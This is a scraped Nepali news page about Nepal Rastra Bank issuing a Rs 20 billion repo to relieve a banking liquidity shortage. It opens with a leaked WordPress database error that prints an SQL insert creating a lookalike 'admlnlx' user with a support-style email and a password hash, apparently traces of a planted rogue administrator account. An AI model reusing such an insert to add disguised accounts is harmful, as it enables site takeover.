WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B4wVfKjl5x4poBXM7QWcR6WOOnRdpd0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 03:29:43', '', 'admlnlx', 'admlnlx')

रु २०अर्बको रिपोर्ट जारी गर्दै राष्ट्र बैंक – Gaule Khabar

रु २०अर्बको रिपोर्ट जारी गर्दै राष्ट्र बैंक

रु २०अर्बको रिपोर्ट जारी गर्दै राष्ट्र बैंक

काठमाडौँ । नेपाल राष्ट्र बैंकले आज रु २० अर्बको १४ दिन अवधिको रिपो जारी गर्ने भएको छ । बैंकले यही कात्तिक २५ गते परिपक्व हुने रिपो बोलकबोल माध्यमबाट बैंकिङ प्रणालीमा प्रवाह गर्न लागेको हो ।

बैंकिङ प्रणालिमा तरलता व्यवस्थापनमा समस्या देखिँदा तरलता प्रवाह गर्न केन्द्रीय बैंकले केही समय अघिदेखि निरन्तर गर्न रिपो जारी गर्दै आएको छ । बोलकबोलमा इजाजतप्राप्त क, ख र ग वर्गका स्वीकृतप्राप्त बैंक वित्तीय संस्थाले भाग लिन पाउने बैंकले जनाएको छ ।
तरलता अभावले बैंक तथा वित्तीय संस्थामा निक्षेपको चाप परेको देखिन्छ । केन्द्रीय बैंकले चालु आर्थिक वर्षको मौद्रिक नीतिमा बैंकहरुले कर्जा निक्षेप अनुपात ९० प्रतिशत कायम गर्नुपर्ने अवस्थाका व्यवस्थापनमा समेत बैंकलाई अप्ठेरो परेको देखिन्छ । राष्ट्र बैंकको तथ्याङ्कानुसार हाल बैंकका औषत कर्जा निक्षेप अनुपात ८९ दशमलव १५ छ ।

बजारमा नयाँ निक्षेप नआएको र राष्ट्र बैंकले तोकेबमोजिम कर्जा निक्षेप अनुपात कायम गर्नुपर्नेलगायतका समस्याले बैंकले निक्षेपको व्याजसमेत बढाउनु परेको बैकरहरु बताए । निक्षेप बढाउन र आफ्नो निक्षेप बाहिर जान नदिन बैंक तथा वित्तीय संस्थाले चालु आर्थिक वर्षको पहिलो त्रैमासिकको सुरुआतमै निक्षेपमा दुई अङ्कको व्याजदर तोकेका थिए । यसरी बैंक तथा वित्तीय संस्थाले व्याजदर असाधारण रुपमा बढाएको जनाउँदै व्यवस्थित गर्न राष्ट्र बैंकले तीन बुँदे निर्देशन नै जारी गरेको थियो । हाल अधिकांश बैंकले निक्षेपमा अधिकतम नौ दशमलव ३६ प्रतिशत व्याज दिँदै आएका छन् ।
बैंकिङ प्रणालीमा तरलता असहज हुँदा राष्ट्र बैंकले लगातार रिपो मार्फत प्रणालिमा तरलता प्रवाह गर्दै आएको छ । यही कात्तिक ३ गते पनि बैंकले रु १० अर्व बराबरको ७ दिन अवधिको रिपो जारी गरेको थियो ।
तरलताको व्यवस्थापन गर्न बैंक तथा वित्तीय संस्थाले रिपो, अन्तर बैंक सापटी, अस्थायी तरलता सुबिधा जस्ता उपकरणको प्रयोग गर्दछन् । केन्द्रीय बैंकको तथ्याङ्कानुसार हाल अन्तरबैंक सापटीको दर चार दशमलव ९६ पुगेको छ । बुधबारसम्म बैंक वित्तीय संस्थाले रु १० खर्ब ९१ अर्ब ६४ करोड ५० लाख अस्थायी तरलता सुविधाको प्रयोग गरेका छन् । बैंक वित्तीय संस्थाले यस्ता उपकरणको निरन्तर प्रयोग गरी रहेपनि तरलता व्यवस्थापन सहज हुन सकेको छैन ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका